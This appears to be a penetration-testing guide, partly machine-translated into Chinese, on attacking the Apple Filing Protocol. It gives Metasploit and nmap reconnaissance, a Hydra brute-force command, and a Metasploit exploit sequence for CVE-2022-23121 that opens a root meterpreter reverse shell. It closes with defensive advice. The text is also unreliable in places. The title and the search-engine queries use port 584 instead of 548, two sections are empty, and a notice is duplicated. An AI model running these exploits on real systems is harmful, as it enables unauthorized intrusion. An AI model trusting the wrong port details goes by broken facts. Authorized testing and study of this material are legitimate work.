584 - Afp

💡 学习提示: 本文档介绍 584 - AFP 的渗透测试方法，适合信息安全初学者和从业人员参考。

⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

548 - 渗透测试 Apple Filing 协议 (AFP)

基本信息

The Apple Filing 协议 (AFP), once known as AppleTalk Filing 协议, is a specialized network protocol included within Apple File 服务 (AFS). It is designed to provide file services for macOS and the classic Mac OS. AFP stands out for supporting Unicode file names, POSIX-style and ACL permissions, resource forks, named extended attributes and sophisticated file-locking mechanisms.

Although AFP has been superseded by SMB in modern macOS releases (SMB is the default since OS X 10.9), it is still encountered in:

• Legacy macOS / Mac OS 9 environments
• NAS appliances (QNAP, Synology, Western Digital, TrueNAS…) that embed the open-source Netatalk daemon
• Mixed-OS networks where Time-Machine-over-AFP is still enabled

默认 TCP 端口: 548 (AFP over TCP / DSI)

PORT     STATE SERVICE
548/tcp  open  afp

信息收集

Quick banner / server info

## Metasploit auxiliary
use auxiliary/scanner/afp/afp_server_info
run RHOSTS=<IP>

## Nmap NSE
nmap -p 548 -sV --script "afp-* and not dos" <IP>

Useful AFP NSE scripts:

The NSE brute-force script can be combined with Hydra/Medusa if more control is required:

hydra -L users.txt -P passwords.txt afp://<IP>

Interacting with shares

macOS

## Finder → Go → "Connect to Server…"
## or from terminal
mkdir /Volumes/afp
mount_afp afp://USER:[email protected]/SHARE /Volumes/afp

Linux (using afpfs-ng ‑ packaged in most distros)

apt install afpfs-ng
mkdir /mnt/afp
mount_afp afp://USER:[email protected]/SHARE /mnt/afp
## or interactive client
afp_client <IP>

Once mounted, remember that classic Mac resource-forks are stored as hidden ._* AppleDouble files – these often hold interesting metadata that DFIR tools miss.

Common Vulnerabilities & 漏洞利用

Netatalk unauthenticated 远程代码执行 chain (2022)

Several NAS vendors shipped Netatalk ≤3.1.12. A lack of bounds checking in parse_entries() allows an attacker to craft a malicious AppleDouble header and obtain remote root before authentication (CVSS 9.8 – CVE-2022-23121). A full write-up by NCC Group with PoC exploiting Western-Digital PR4100 is available.

Metasploit (>= 6.3) ships the module exploit/linux/netatalk/parse_entries which delivers the payload via DSI WRITE.

use exploit/linux/netatalk/parse_entries
set RHOSTS <IP>
set TARGET 0   # Automatic (Netatalk)
set PAYLOAD linux/x64/meterpreter_reverse_tcp
run

If the target runs an affected QNAP/Synology firmware, successful exploitation yields a shell as root.

Netatalk OpenSession heap overflow (2018)

Older Netatalk (3.0.0 - 3.1.11) is vulnerable to an out-of-bounds write in the DSI OpenSession handler allowing unauthenticated code execution (CVE-2018-1160). A detailed analysis and PoC were published by Tenable Research.

Other notable issues

• CVE-2022-22995 – Symlink redirection leading to arbitrary file write / 远程代码执行 when AppleDouble v2 is enabled (3.1.0 - 3.1.17).
• CVE-2010-0533 – Directory traversal in Apple Mac OS X 10.6 AFP (detected by afp-path-vuln.nse).
• Multiple memory-safety bugs were fixed in Netatalk 4.x (2024) – recommend upgrading rather than patching individual CVEs.

Defensive Recommendations

1. Disable AFP unless strictly required – use SMB3 or NFS instead.
2. If AFP must stay, upgrade Netatalk to ≥ 3.1.18 or 4.x, or apply vendor firmware that back-ports the 2022/2023/2024 patches.
3. Enforce Strong UAMs (e.g. DHX2), disable clear-text and guest logins.
4. Restrict TCP 548 to trusted subnets and wrap AFP inside a VPN when exposed remotely.
5. Periodically scan with nmap -p 548 --script afp-* in CI/CD to catch rogue / downgraded appliances.

Brute-Force

搜索引擎语法

FOFA

# FOFA 搜索语法
port="584"

Shodan

# Shodan 搜索语法
port:584

ZoomEye

# ZoomEye 搜索语法
port:584

📖 参考资料

• HackTricks - 584-afp